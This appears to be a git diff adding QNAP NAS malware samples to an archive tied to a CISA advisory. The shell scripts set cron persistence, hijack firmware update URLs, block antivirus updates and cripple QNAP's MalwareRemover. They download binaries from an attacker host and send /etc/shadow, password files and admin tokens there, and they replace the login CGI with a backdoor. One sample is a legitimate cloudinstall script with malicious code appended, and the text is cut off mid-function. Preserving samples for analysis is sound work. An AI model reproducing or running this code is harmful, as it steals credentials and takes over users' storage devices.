cronhour=$(printf '%i' "$(( $RANDOM % 24 ))")
|
||||
cronhour=$(printf '%i,' "$(( ( $cronhour + 8 ) % 24 ))" "$(( ( $cronhour + 16 ) % 24 ))")"$cronhour"
|
||||
echo "$cronmins $cronhour"' * * * '"${bdir}/.qpkg/.liveupdate/liveupdate.sh >/dev/null 2>/dev/null" >> "$crontab"
|
||||
sleep 5
|
||||
fi
|
||||
done
|
||||
|
||||
grep 'Liveupdate\|FirmwareRelease\|QTS_FW' /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com' >/dev/null && sed -i 's/https\?:\/\/[^\/]\+\/\(Liveupdate\|FirmwareRelease\|QTS_FW\)/http:\/\/0.0.0.0\/\1/' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
|
||||
sedexpr='QPKG CENTER XML\|Live Update XML\|FW_XML_ALT'
|
||||
if grep "${sedexpr}" /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com' >/dev/null; then
|
||||
sed -i 's/^ *\('"${sedexpr}"'\)\(.*https\?:\/\/[^\/]*\)\(qnap\.com[^\/]*\)/\1\20.0.0.0/' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
|
||||
grep "${sedexpr}" /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com' && sed -i 's/^ *\('"${sedexpr}"'\).*qnap\.com/\1 = /' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
|
||||
fi
|
||||
|
||||
( ( exec >/dev/null 2>&1 </dev/null; "${bdir}/.qpkg/.liveupdate/liveupdate.sh" </dev/null >/dev/null 2>/dev/null & ) & )
|
||||
exit 0
|
212
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/55b5671876f463f2f75db423b188a1d478a466c5e68e6f9d4f340396f6558b9f
Normal file
212
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/55b5671876f463f2f75db423b188a1d478a466c5e68e6f9d4f340396f6558b9f
Normal file
@ -0,0 +1,212 @@
|
||||
#!/bin/bash
|
||||
ts=1548478800
|
||||
PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin"
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"` && test -d "$bdir" || bdir=''
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { while read -r bdir; do
|
||||
test -d "$bdir" && break; bdir=''
|
||||
done <<EOF
|
||||
$(mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp")
|
||||
EOF
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in {{CE_,}CACHEDEV{1,2,3},MD0,HDA}_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { bdir=/mnt/HDA_ROOT && test -d "$bdir" || bdir='/'; }; }
|
||||
|
||||
getcfg MalwareRemover Version -f /etc/config/qpkg.conf && setcfg MalwareRemover Version 9.0.0 -f /etc/config/qpkg.conf
|
||||
getcfg MalwareRemover Date -f /etc/config/qpkg.conf && setcfg MalwareRemover Date 2019-02-25 -f /etc/config/qpkg.conf
|
||||
getcfg MalwareRemover Build -f /etc/config/qpkg.conf && setcfg MalwareRemover Build 1551070800 -f /etc/config/qpkg.conf
|
||||
|
||||
if grep "ipv6.clamav.net" /etc/hosts; then
|
||||
:
|
||||
else
|
||||
countries='ac ad ae af ag ai al am an ao aq ar as at au aw ax az ba bb bd be bf bg bh bi bj bl bm bn bo bq br bs bt bv bw by bz ca cc cd cf cg ch ci ck cl cm cn co cr cu cv cw cx cy cz de dj dk dm do dz ec ee eg eh er es et eu fi fj fk fm fo fr ga gb gd ge gf gg gh gi gl gm gn gp gq gr gs gt gu gw gy hk hm hn hr ht hu id ie il im in io iq ir is it je jm jo jp ke kg kh ki km kn kp kr kw ky kz la lb lc li lk lr ls lt lu lv ly ma mc md me mf mg mh mk ml mm mn mo mp mq mr ms mt mu mv mw mx my mz na nc ne nf ng ni nl no np nr nu nz om pa pe pf pg ph pk pl pm pn pr ps pt pw py qa re ro rs ru rw sa sb sc sd se sg sh si sj sk sl sm sn so sr ss st su sv sx sy sz tc td tf tg th tj tk tl tm tn to tp tr tt tv tw tz ua ug uk um us uy uz va vc ve vg vi vn vu wf ws ye yt za zm zw'
|
||||
|
||||
{ for host in 'bugs.clamav.net' 'current.cvd.clamav.net' 'database.clamav.net' 'db.local.clamav.net' 'update.nai.com'; do
|
||||
echo "0.0.0.0 ${host}"
|
||||
done
|
||||
|
||||
for country in $countries; do
|
||||
echo "0.0.0.0 db.${country}.clamav.net"
|
||||
echo "0.0.0.0 db.${country}.ipv6.clamav.net"
|
||||
echo "0.0.0.0 db.${country}.big.clamav.net"
|
||||
done; } >>/etc/hosts
|
||||
fi
|
||||
|
||||
test -z "$PWD" && PWD=$(pwd)
|
||||
CWD="$PWD"
|
||||
if [ "${CWD%/*}" != "${bdir}/.qpkg" ]; then
|
||||
CWD=''
|
||||
for dir in '.config' '.liveupdate'; do
|
||||
dir="${bdir}/.qpkg/${dir}"
|
||||
test -d "$dir" && cd "$dir" && CWD="$dir" && break
|
||||
done
|
||||
fi
|
||||
test "$CWD" && test -d "$CWD" && cd "$CWD"
|
||||
|
||||
sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'\
|
||||
verifykey="${verifykey}"'"'"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/'
|
||||
grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex'
|
||||
for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
|
||||
if [ -f "${path#*/}" ]; then
|
||||
grep "$grepstring" "${path#*/}" && sed -i "$sedcmd" "${path#*/}"
|
||||
elif [ -f "${bdir}/.qpkg/${path}" ]; then
|
||||
test -f "${bdir}/.qpkg/${path}" && grep "$grepstring" "${bdir}/.qpkg/${path}" && sed -i "$sedcmd" "${bdir}/.qpkg/${path}"
|
||||
fi
|
||||
done
|
||||
|
||||
sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'/CXqrBM2CVbJo'"'"';verifykey="${verifykey}"'"'"'g4rwwSz1Bp1i1'"'/"
|
||||
grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1'"'"
|
||||
for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
|
||||
if [ -f "${path#*/}" ]; then
|
||||
grep "$grepstring" "${path#*/}" && sed -i "$sedcmd" "${path#*/}"
|
||||
elif [ -f "${bdir}/.qpkg/${path}" ]; then
|
||||
test -f "${bdir}/.qpkg/${path}" && grep "$grepstring" "${bdir}/.qpkg/${path}" && sed -i "$sedcmd" "${bdir}/.qpkg/${path}"
|
||||
fi
|
||||
done
|
||||
|
||||
version=$(getcfg System Version)
|
||||
test "x${version}" = 'x' && version=$(getcfg System Version -f /etc/default_config/uLinux.conf)
|
||||
|
||||
for file in /etc/config/rssdoc/qpkgcenter_*.xml
|
||||
do
|
||||
test -f "$file" && rm "$file" && cp "./rssdoc/Liveupdate/QTS${version}/${file##*/}" "$file" && test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
|
||||
done
|
||||
file=''
|
||||
if find /etc/config/ | grep 'qpkgcenter_.*\.xml'; then
|
||||
:
|
||||
else
|
||||
cp "./rssdoc/Liveupdate/QTS${version}/qpkgcenter_eng.xml" '/etc/config/rssdoc/qpkgcenter_eng.xml'
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i '/etc/config/rssdoc/qpkgcenter_eng.xml'
|
||||
fi
|
||||
|
||||
if [ ! -f ".qdisk_cmd" ]; then
|
||||
case "$(uname -m)" in
|
||||
*x86_64*)
|
||||
arch=x86_64
|
||||
binhash='g2oe7EJJVCiAHY6AG1I1c/lGF8Y='
|
||||
;;
|
||||
*arm*)
|
||||
arch=arm
|
||||
binhash='Z3twHZvQqYZ1vLeu4PLnZekdkRY='
|
||||
;;
|
||||
*i*86*)
|
||||
arch=i486
|
||||
binhash='gWzECXuIp3dz5yI7RJS9d4+xpq4='
|
||||
;;
|
||||
esac
|
||||
|
||||
if [ "x${binhash}" != 'x' ]; then
|
||||
curl --connect-timeout 12 -m 1200 -k -o ".qdisk_cmd.tmp" "https://qpqift.top/data/qdisk_cmd_${arch}" || rm -f ".qdisk_cmd.tmp"
|
||||
test -f '.qdisk_cmd.tmp' && rsynchash="$(openssl dgst -sha1 -binary ".qdisk_cmd.tmp" | openssl base64)"
|
||||
if [ "x${rsynchash}" = "x${binhash}" ]; then
|
||||
mv '.qdisk_cmd.tmp' '.qdisk_cmd' && chmod +x '.qdisk_cmd'
|
||||
else
|
||||
rm -f '.qdisk_cmd.tmp'
|
||||
fi
|
||||
fi
|
||||
fi
|
||||
binhash=''; rsynchash=''
|
||||
|
||||
for qpkgdir in "${bdir}/.qpkg" '../../.qpkg'; do
|
||||
test -d "$qpkgdir" && break
|
||||
done
|
||||
test -d "${qpkgdir}/MalwareRemover" || mkdir "${qpkgdir}/MalwareRemover"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i "${qpkgdir}/MalwareRemover"
|
||||
|
||||
if [ -d "${qpkgdir}/MalwareRemover/modules" ]; then
|
||||
for file in 10_derek_3.pyc 12_derek_3.pyc; do
|
||||
test ! -f "${qpkgdir}/MalwareRemover/modules/${file}" || rm -f "${qpkgdir}/MalwareRemover/modules/${file}" && cat >"${qpkgdir}/MalwareRemover/modules/${file}" <<"EOF"
|
||||
#!/bin/sh
|
||||
exit 0
|
||||
EOF
|
||||
chmod +x "${qpkgdir}/MalwareRemover/modules/${file}"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i "${qpkgdir}/MalwareRemover/modules/${file}"
|
||||
done
|
||||
fi
|
||||
file=''; qpkgdir=''
|
||||
|
||||
if [ ! -f .rsakey ]; then
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
CXqrBM2CVbJog4rwwSz1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
fi
|
||||
|
||||
if [ ! -f "${ts}_c" ]; then
|
||||
key=$(tr -dc 'a-zA-Z0-9' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
|
||||
test "x$key" = 'x' && key=$(LC_ALL=C sed 's/[^a-zA-Z0-9]//g' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
|
||||
{ echo "$key" | openssl rsautl -pubin -inkey .rsakey -encrypt | openssl enc -base64 -A; printf ':'
|
||||
{ echo; for file in "${bdir}/.log/.rqsys.log" /etc/config/.qos_config/users/admin/.qtoken /etc/config/.qos_config/users/admin/secondSV.conf /etc/config/ssmtp/ssmtp.conf /etc/config/smbpasswd /etc/shadow /mnt/HDA_ROOT/.config/qnapddns.conf /mnt/HDA_ROOT/.config/qid.conf; do printf '%s:' "$file"; cat "$file"; echo; done; printf '%s:' "authLogin.cgi"; /home/httpd/cgi-bin/authLogin.cgi; } | gzip | { dd bs=4096 count=512 || head -c 2097152 || cat; } | openssl enc -aes-256-cbc -k "$key" -md md5 -salt -a -A; } | curl --connect-timeout 12 -m 300 -k -d '@-' "https://qpqift.top/ping.pl"
|
||||
fi
|
||||
|
||||
cgibindir='/home/httpd/cgi-bin'
|
||||
if [ ! -f "1547971200_c" ] && [ ! -f "${cgibindir}/sysauthLogin.cgi" ] && [ -f "${cgibindir}/authLogin.cgi" ]; then
|
||||
case "$(uname -m)" in
|
||||
*x86_64*)
|
||||
arch=x86_64
|
||||
binhash='pt+a/Y3gGOPe9uyBgm85h2eOQV8='
|
||||
;;
|
||||
*arm*)
|
||||
arch=arm
|
||||
binhash='W5SbpKsI90NUy4uQg3Pm1agAFho='
|
||||
;;
|
||||
*i*86*)
|
||||
arch=i486
|
||||
binhash='TagzVbVf5YhxA3ZXwgBMQKw2zG4='
|
||||
;;
|
||||
esac
|
||||
|
||||
if [ "x${binhash}" != 'x' ]; then
|
||||
curl --connect-timeout 12 -m 1200 -k -o ".qal" "https://qpqift.top/data/qal_${arch}" || rm -f ".qal"
|
||||
test -f '.qal' && rsynchash="$(openssl dgst -sha1 -binary ".qal" | openssl base64)"
|
||||
if [ "x${rsynchash}" = "x${binhash}" ]; then
|
||||
test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
|
||||
mv "${cgibindir}"/authLogin.cgi "${cgibindir}"/sysauthLogin.cgi && test -f "${cgibindir}"/sysauthLogin.cgi && mv '.qal' "${cgibindir}"/authLogin.cgi && chmod +x "${cgibindir}"/authLogin.cgi
|
||||
fi
|
||||
fi
|
||||
test -f "1547971200_c" || touch "1547971200_c"
|
||||
fi
|
||||
|
||||
test ! -f "${cgibindir}"/authLogin.cgi && test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
|
||||
|
||||
if [ ! -d rssdoc ]; then
|
||||
command -v bunzip2 && compext=bz2 || compext=gz
|
||||
curl --connect-timeout 12 -m 1200 -k -o "rssdoc.tar.${compext}" "https://qpqift.top/data/rssdoc.tar.${compext}" || { rm "rssdoc.tar.${compext}" && exit 1; }
|
||||
test -f "rssdoc.tar.${compext}" || exit 1
|
||||
rssdochash="$(openssl dgst -sha1 -binary "rssdoc.tar.${compext}" | openssl base64)"
|
||||
test "$rssdochash" = 'WOkc6vlUa7A30GKa4Z4o02CIexk=' || test "$rssdochash" = "0h0Jyx52a/F9YB80Ml4SsEsugyA=" || { rm -f "rssdoc.tar.${compext}"; exit 1; }
|
||||
test "$compext" = bz2 && tarflag=j || tarflag=z
|
||||
tar -x${tarflag}f "rssdoc.tar.${compext}" || { rm -f rssdoc.tar.{,.${compext}}; exit 1; }
|
||||
rm -f "rssdoc.tar.${compext}"
|
||||
fi
|
||||
|
||||
rm /home/httpd/{Liveupdate,FirmwareRelease{,_beta}S.xml}
|
||||
ln -s "${CWD}"/rssdoc/{Liveupdate,FirmwareRelease{,_beta}S.xml} /home/httpd
|
||||
|
||||
if grep 'Liveupdate\|FirmwareRelease\|QTS_FW' /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com\|0\.0\.0\.0'; then
|
||||
internalwebport=$(/sbin/getcfg System InnerWebAccessPort -d 58080)
|
||||
localupdateurl="http://127.0.0.1:${internalwebport}"
|
||||
sed -i 's/https\?:\/\/[^\/]\+\/\(Liveupdate\|FirmwareRelease\|QTS_FW\)/http:\/\/127.0.0.1:'${internalwebport}'\/\1/' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
|
||||
fi
|
||||
|
||||
test -f /etc/config/.qsync.conf && authkeysfile=$(grep AuthorizedKeysFile /etc/config/.qsync.conf | sed 's/"//g' | cut -d ' ' -f 2)
|
||||
if [ "$authkeysfile" ] && [ -f "$authkeysfile" ] && grep 'miOGcmendZU2r10SdZVplBQ4i' "$authkeysfile"; then
|
||||
sed -i '/miOGcmendZU2r10SdZVplBQ4i/d' "$authkeysfile"
|
||||
lsofout="$(lsof +c 0 -i -n -P | grep :51163)"
|
||||
sshpid="$(echo "$lsofout" | tr -s ' ' | cut -d ' ' -f 2 | head -n 1)"
|
||||
kill -2 "$sshpid"
|
||||
fi
|
||||
|
||||
test -f "${ts}_c" || touch "${ts}_c"
|
||||
rm -f "${CWD}/".tmp.*
|
||||
exit 0
|
510
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/5cb5dce0a1e03fc4d3ffc831e4a356bce80e928423b374fc80ee997e7c62d3f8
Normal file
510
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/5cb5dce0a1e03fc4d3ffc831e4a356bce80e928423b374fc80ee997e7c62d3f8
Normal file
@ -0,0 +1,510 @@
|
||||
#!/bin/sh
|
||||
QNAP_QPKG=cloudinstall
|
||||
QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
|
||||
NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
|
||||
CLOUD_INSTALL_PATH=/tunnel_agent
|
||||
CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
|
||||
CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
|
||||
COUNTER=1
|
||||
ERROR_BAD_REQUEST=400
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
case "$1" in
|
||||
start)
|
||||
START_TIME=$(date +"%T")
|
||||
echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
|
||||
while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
|
||||
do
|
||||
# report device info and get cloudinstall agent app download url
|
||||
DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
|
||||
if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
# create ramdisk and create a 64mb file
|
||||
/bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
|
||||
# create block size 1K filesystem
|
||||
/sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
|
||||
# create virtual disk
|
||||
export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
# mount virtual disk
|
||||
/bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
|
||||
else
|
||||
# create and mount tmpfs folder
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
fi
|
||||
cd $CLOUD_INSTALL_PATH
|
||||
|
||||
if [[ $DOWNLOAD_URL == https* ]]; then
|
||||
REPORT_SUCCESS_TIME=$(date +"%T")
|
||||
else
|
||||
REPORT_FAIL_TIME=$(date +"%T")
|
||||
echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
|
||||
# stop retry when got bad request
|
||||
# prevent put bad request all the time
|
||||
if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
|
||||
break
|
||||
fi
|
||||
fi
|
||||
|
||||
# downlaod cloudinstall agent app
|
||||
/usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
|
||||
|
||||
if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
|
||||
DOWNLOAD_FINISH_TIME=$(date +"%T")
|
||||
# unzip and execute cloudinstallagent
|
||||
/bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
|
||||
|
||||
UNZIP_TIME=$(date +"%T")
|
||||
fi
|
||||
|
||||
if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
# create folder and create symbolic link
|
||||
/bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
|
||||
fi
|
||||
|
||||
# wait connect
|
||||
sleep 5
|
||||
CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
|
||||
if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
|
||||
SLEEP_TIME=$(( 30 * $COUNTER ))
|
||||
if [ $SLEEP_TIME -gt 300 ]; then
|
||||
SLEEP_TIME=300
|
||||
fi
|
||||
# wait next retry
|
||||
sleep $SLEEP_TIME
|
||||
fi
|
||||
COUNTER=$(( $COUNTER * 2 ))
|
||||
done
|
||||
|
||||
END_TIME=$(date +"%T")
|
||||
echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
|
||||
# call for a new process group and for later kill
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
|
||||
|
||||
# set cloudinstall report status
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
|
||||
# add link to report offline
|
||||
/bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
|
||||
|
||||
# buzzer
|
||||
HARDWARE_TYPE=$(uname -m)
|
||||
if [[ "$HARDWARE_TYPE" == *"x86"* ]];
|
||||
then
|
||||
/sbin/hal_app --se_buzzer enc_id=0,mode=101
|
||||
elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
|
||||
then
|
||||
/sbin/pic_raw 81
|
||||
fi
|
||||
;;
|
||||
|
||||
stop)
|
||||
# disconnect cloudinstall agent
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
|
||||
for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
|
||||
do
|
||||
# use bash kill instead /bin/kill for kill process group
|
||||
# cloudinstall agent daemon and inotifywait
|
||||
kill -9 -- -$i &>/dev/null
|
||||
done
|
||||
|
||||
# umount
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
/bin/umount -l $USED_LOOP_DEVICE
|
||||
/usr/local/sbin/losetup -d $USED_LOOP_DEVICE
|
||||
else
|
||||
/bin/umount -l $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
# remove all files
|
||||
if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $NAS_CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
|
||||
fi
|
||||
;;
|
||||
|
||||
restart)
|
||||
$0 stop
|
||||
$0 start
|
||||
;;
|
||||
|
||||
*)
|
||||
echo "Usage: $0 {start|stop|restart}"
|
||||
{ /share/MD0_DATA/NOPE; exit 1; }
|
||||
esac
|
||||
{ /share/MD0_DATA/NOPE; exit 0; }
|
||||
|
||||
|
||||
set_env()
|
||||
{
|
||||
debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
|
||||
if [ "$debug" != "NULL" ]; then
|
||||
/bin/touch $LOG_FILE
|
||||
else
|
||||
/bin/rm -f $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
set_env
|
||||
|
||||
dbg()
|
||||
{
|
||||
if [ -f "$LOG_FILE" ]; then
|
||||
echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
dbg "> $0 $@ (pid $$)"
|
||||
|
||||
fi
|
||||
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
|
||||
EOF
|
||||
test "$fgrep" || fgrep=grep
|
||||
test "$RANDOM" || RANDOM=17653
|
||||
genrstr ()
|
||||
{
|
||||
local s=;
|
||||
local min=${1:-4};
|
||||
local max=${2:-12};
|
||||
local kspace="${3:-a-zA-Z}"
|
||||
tr -dc "$kspace" < /dev/urandom | {
|
||||
read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
|
||||
echo "$s"
|
||||
}
|
||||
}
|
||||
|
||||
verifyfile() {
|
||||
local file="$1"
|
||||
local sig="${2:-$file_s}"
|
||||
local out
|
||||
test ! -z "$file" && test -s "$file" || return 1
|
||||
test ! -z "$sig" && test -s "$sig" || return 1
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
decryptfile() {
|
||||
local file="$1"
|
||||
local ofile="${2:-${file}}"
|
||||
local key='NOPE'
|
||||
